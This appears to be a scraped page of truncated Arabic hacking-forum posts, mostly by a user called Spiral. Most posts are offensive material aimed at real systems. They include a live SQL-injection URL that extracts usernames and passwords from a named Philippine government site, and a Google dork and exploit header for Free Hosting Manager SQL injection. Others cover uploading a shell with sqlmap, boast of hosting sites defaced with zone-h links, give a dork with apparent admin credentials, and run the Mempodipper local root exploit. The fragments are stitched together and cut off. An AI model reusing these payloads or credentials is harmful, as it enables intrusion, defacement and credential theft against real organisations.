السلام عليكم
لنفرض انت على اليوزر spiral وسحبت كونفق الهدف على اليوزر jordan
تيجي تحاول تتصل بالقاعدة او تحاول رفع اندكس من اي سكربت ما يقبل ويجيك الآتي:
Access denied for user 'spiral_jordan'@'localhost' (using password: YES)
الحل يا عزيزي انك تتصل بالسيرفر عكسي بإحدى طرق...
السلام عليكم
رفع شيل عن طريق ثغرات sql باستخدام اداة sqlmap
هذه الخاصية موجودة في اداة sqlmap وشفتها مشروحة في منتدى اجنبي وحبيتها اشرحها لكم
ندخل في الشرح على طول
اولا: نفتح موجة الأوامر ونذهب للمسار التالي عن طريق الأمر
cd /pentest/database/sqlmap
ثانيا: نطبق الأمر التالي
./sqlmap.py...
رد: طريقة حجب اي موقع من جهازك
بالنسبة لي انا استخدم فايرفوكس هناك اضافة معينة للفايرفوكس تمنع الاعلانات
اذا كنت تستخدم متصفح فايرفوكس احكيلي عشان انزل لنك الاضافة هنا
السلام عليكم
بعد انقطاع فترة كبيرة حبيت ارجعلكم بثغرة قوية من اكتشافي
####
# Exploit Title: Free Hosting Manager V2.0 SQL Injection Vulnerability
# Author: Spiral
# E-mail: for-hacker@hotmail.com
# Google Dork: inurl:clients/packages.php?id=1
# Tested on: ***91;Windows 7***93;
# Vendor...
رد: موقع حكومي مصاب asp
اول مرة ادخل القسم هنا هههه يلا مش مشكلة
تفضلوا الموقع محقون جاهز :)
http://caoayanis.gov.ph/announce.asp?id=-6+union+select+1,concat%28myusername,0x3a3a,mypassword%29,3,4+from+webuser--
رد: Private brute force vbulletin - تخمين المنتديات . . s1a4a
السلام عليكم
مالكم يا جماعة داقين بالرجال
الاداة موجودة من زمان وهي برمجة اجنبية اول شي ما حد يفكرها عربية يعني :P
فكرة الاداة واضحة واللي يقول مو شغالة يجرب يغير البروكسيات
الاداة جربتها وناجحة 100%
سلام
رد: ثغرة قوية في مواقع الاستضافات :)
بالنسبة لرفع الاندكس روح على اليمين تلاقي تعديل على القوالب ومنها اختار الاستايل وعدل على ملف header
اما لرفع شيل حاولت اعدل ملف php لكن اعطاني انه يمنع التعديل على ملفات php وجاري بحث عن طريقة لرفع شيل
رد: ثغرة قوية في مواقع الاستضافات :)
حبيبي الطريقة ناجحة 100%
شوف انا اخترقت من هالثغرة ثلاث استضافات وهي التسجيل
http://zone-h.org/mirror/id/18248864
http://zone-h.org/mirror/id/18248899
http://zone-h.org/mirror/id/18248888
لكن الثغرة لما انتشرت الشباب العربي هجم عليها بسرعة وغيروا اليوزر...
السلام عليكم
الدورك في في جوجل
by am4ss
بعد الرابط اكتب
admincp
اليوزر: aler t@am4ss.com
الباس: kawkawa
لكن شيل الفراغ في اليوزر بسبب التشفير في منتدى العناكب
السلام عليكم
هذا الشرح لفتح بورت في مودم Livebox والشرح بسيط من دون صور او فيديو
1- ادخل الى صفحة المودم وضع اليوزر والباسوورد http://192.168.1.1
2- بعد الدخول اضغط على LAN server
3- اضغط على Add
4- * Server name : اكتب اسم البرنامج او اي شي
* Access activated : خليها Yes
* Protocol ...
Hi all ...
This is a new local root wich working for >=2.6.39 kernals ..
Such as 3.0.0-15
Usr@H4x0r~/Desktop$ gcc CVE-2012-0056-Mempodipper.c -o CVE-2012-0056-Mempodipper
Usr@H4x0r~/Desktop$ ./CVE-2012-0056-Mempodipper
===============================
= Mempodipper =
=...